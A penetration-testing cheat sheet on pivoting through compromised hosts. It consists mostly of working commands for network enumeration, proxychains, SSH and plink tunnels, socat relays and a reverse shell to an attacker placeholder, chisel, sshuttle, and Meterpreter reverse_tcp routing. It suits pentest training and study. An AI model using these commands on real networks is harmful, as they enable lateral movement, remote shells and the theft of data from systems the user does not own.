7.1 KiB
7.1 KiB
Pivoting
In the realm of penetration testing, "pivoting" refers to the technique of using a compromised system or foothold within a target network to launch further attacks or gain deeper access into the network as a proxy for the attacker. It involves moving laterally within the network infrastructure by leveraging the compromised system as a stepping stone to reach more sensitive or valuable assets. Pivoting allows a penetration tester (or an attacker) to explore and exploit additional vulnerabilities and systems that may not be directly accessible from their initial point of entry.
Enumeration
Using material found on the machine and preinstalled tools
arp -a/etc/hostsorC:\Windows\System32\drivers\etc\hosts/etc/resolv.confipconfig /allnmcli dev show- Statically compiled tools
Scripting Techniques
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
- Using local tools through a proxy like
nmap
Tools
- Enumerating a network using native and statically compiled tools
Proxychains / FoxyProxy
- In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
ssh <username>@$ATTACKER_IP -R 9050 -N - Proxychains, e.g. scan target via nmap, or connect via nc through jump server
proxychains nc <IP> <PORT> proychains nmap <IP> proxychains ssh user@$TARGET_IP proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS proxychains wget http://$TARGET_IP:8000/loot.zip- Use
/etc/proxychains.confor./proxychains.confcontaining:
[ProxyList] # add proxy here ... # meanwhile # defaults set to "tor" socks4 127.0.0.1 9050 #socks5 127.0.0.1 1337 # proxy_dns - Use
- FoxyProxy, choose proxy type, proxy IP and port in settings
SSH port forwarding and tunnelling (primarily Unix)
-
LocalPortForwarding
ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN- Another possibility to use the jumpserver directly on it's cli via
ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N. One can connect now to the target via the jumpserver - Tip: open port on windows target via
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT% - Another possibility to use the jumpserver directly on it's cli via
-
Dynamic Port Forwarding
ssh -D $PORT <user>@<Jumpserver> -fN -
Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN- Tip1: create a user on the attacker to receive the connection without compromising your own password
- Tip2: use
-Nto not receive an interactive shell. The attacking user does not necessarily have one on the target
plink.exe (Windows)
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
- Key generation
puttygen <keyfile> -o key.ppk - Circumvention, described by U.Y.
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
Socat
Local PortForwarding via Socat
Open a local port (here 80) on a network interface
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
Open a reverse shell via Socat
- Reverse shell on target via
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
- Attacking bind shell on attacker
sudo nc -lvnp 443
Jumpserver via Socat
- Relay on a jumpserver via
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
Quiet Port Forwarding Through a Relay Server via Socat
- On attacker
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
- On relay server
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
Notes: Open localhost:8000 on the attacker's browser or curl it afterwards. Processes are backgrounded via &. Therefore, the process can be quit by using the corresponding bg number like kill %1.
Forward Local Port via Socat
- In need of a Download on target, expose a port on the attacker via relay
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
Chisel
-
Does not require SSH on target
-
Reverse Proxy
- Bind port on attacker
./chisel server --reverse --port <ListeningPort> &- Reverse port on target/proxy
./chisel client <attacker-IP>:<attacker-Port> R:socks &proxychains.confcontains
[ProxyList] socks5 127.0.0.1 <Listening-Port> -
Forward SOCKS Proxy
- Proxy/compromised machine
./chisel server -p <Listen-Port> --socks5- On attacker
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks -
Remote Port Forward
- On attacker
./chisel server -p <Listen-Port> --reverse &- On forwarder
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> & -
Local Port Forwarding
- On proxy
./chisel server -p <Listen-Port>- On attacker
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
sshuttle
pip install sshuttlesshuttle -r <user>@<target> <subnet/CIDR>- or automatically determined
sshuttle -r <user>@<target> -N
- Key based auth
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
- Exclude servers via
-x, for example the target/gateway server
Meterpreter
- Meterpreter with payload
set payload linux/x64/meterpreter_reverse_tcpafter successful connection do
portfwd add -l 22 -p 22 -r 127.0.0.1
Meterpreter add Subnet Route
run get_local_subnets
background
route add 10.1.1.0 255.255.255.0 1
route add 172.10.0.1/32 -1
route print
- Or use
load auto_add_routefrom rapid7's documentation
Meterpreter Auto Routing
- Upload payload and catch it with
multi/handler
background
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run
Meterpreter Proxy Routing
- Specify socks proxy via
use auxiliary/server/socks_proxy
- Set proxychain on attacker accordingly
run srvhost=127.0.0.1 srvport=9050 version=4a
curl --proxy socks4a:localhost:9050
proxychains -q nmap 10.10.47.11